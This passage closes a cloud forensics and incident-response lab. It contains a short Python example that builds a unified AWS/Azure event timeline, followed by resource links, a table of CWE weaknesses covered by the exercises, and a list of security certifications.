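aws = [{"eventTime": "2026-03-24T14:36:10Z", "eventName": "CreateAccessKey",
        "userIdentity": {"userName": "dev-jenkins-ci"},
        "sourceIPAddress": "203.0.113.42"}]
azure = [{"eventTimestamp": "2026-03-24T14:34:02Z",
          "operationName": "Microsoft.KeyVault/vaults/secrets/read",
          "caller": "mi-compliance-scanner", "callerIpAddress": "203.0.113.42"}]
for row in unified_timeline(aws, azure):
    print(row["time"].isoformat(), row["cloud"], row["actor"], row["action"])
```

Sorting the normalized records makes cross-cloud sequencing explicit: here the shared source IP ties the Azure Key Vault read to the AWS key creation two minutes later.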
Additional Resources¶
Cross-References¶
- Chapter 20: Cloud Attack & Defense -- cloud security architecture, shared responsibility model, and cloud-native attack techniques
- Chapter 27: Digital Forensics -- forensic methodology, evidence handling, chain of custody, and timeline analysis
- Chapter 28: Advanced Incident Response -- IR lifecycle, containment strategies, and cross-functional coordination
- Chapter 9: Incident Response Lifecycle -- NIST IR framework, preparation, detection, containment, eradication, recovery
- Chapter 46: Cloud & Container Red Teaming -- offensive cloud techniques for understanding attacker TTPs
- Chapter 2: Telemetry & Logging -- log source configuration, CloudTrail, Azure Monitor, log integrity
- Scenario SC-052: Cloud Cryptojacking -- cloud resource abuse detection and response
- Purple Team Exercise Library -- purple team exercises for validating cloud detection capabilities
External Resources¶
- AWS CloudTrail Documentation -- CloudTrail configuration, log format, and integrity validation
- Azure Monitor Documentation -- Azure logging, diagnostics, and Log Analytics
- Microsoft Sentinel Documentation -- SIEM, hunting queries, and analytics rules
- AVML (Acquire Volatile Memory for Linux) -- Microsoft open-source memory acquisition tool
- Volatility 3 Documentation -- memory forensics analysis framework
- AWS Security Incident Response Guide -- AWS official IR guidance
- NIST SP 800-86: Guide to Integrating Forensic Techniques -- forensic methodology standards
- Cloud Forensics Reference Architecture -- CSA cloud forensics guidance
- MITRE ATT&CK Cloud Matrix -- cloud-specific adversary techniques
CWE References¶
| CWE | Name | Exercise |
|---|---|---|
| CWE-522 | Insufficiently Protected Credentials | Ex. 1, 3 (access keys lacking MFA and rotation) |
| CWE-284 | Improper Access Control | Ex. 1, 3 (overprivileged service accounts) |
| CWE-732 | Incorrect Permission Assignment for Critical Resource | Ex. 1 (S3 bucket policy made public) |
| CWE-312 | Cleartext Storage of Sensitive Information | Ex. 2 (credentials in .env file) |
| CWE-200 | Exposure of Sensitive Information | Ex. 2, 3 (IMDS credential exposure) |
| CWE-778 | Insufficient Logging | Ex. 5 (anti-forensics detection gaps) |
| CWE-269 | Improper Privilege Management | Ex. 3 (Managed Identity overscoped) |
| CWE-306 | Missing Authentication for Critical Function | Ex. 2 (IMDSv1 no token required) |
Advance Your Career¶
Recommended Certifications
This lab covers objectives tested in the following certifications. Investing in these credentials validates your cloud forensics and incident response expertise:
| Certification | Focus | Link |
|---|---|---|
| GIAC GCFE -- Certified Forensic Examiner | Digital forensic evidence acquisition, chain of custody, filesystem and artifact analysis | Learn More |
| GIAC GCFA -- Certified Forensic Analyst | Advanced forensic analysis, memory forensics, timeline analysis, threat hunting | Learn More |
| GIAC GCFR -- Cloud Forensics Responder | Cloud evidence collection, AWS/Azure forensics, cross-cloud incident response | Learn More |
| CompTIA CySA+ (CS0-003) | Security operations, threat detection, vulnerability management, and incident response | Learn More |
| CompTIA CASP+ (CAS-004) | Advanced security architecture, engineering, cloud security operations | Learn More |
| AWS Security Specialty (SCS-C02) | AWS security services, infrastructure protection, identity management, data protection | Learn More |
| Azure Security Engineer Associate (AZ-500) | Azure identity, platform protection, security operations, data and application security | Learn More |
| SC-200 -- Microsoft Security Operations Analyst | Sentinel, KQL detection engineering, incident investigation, threat hunting | Learn More |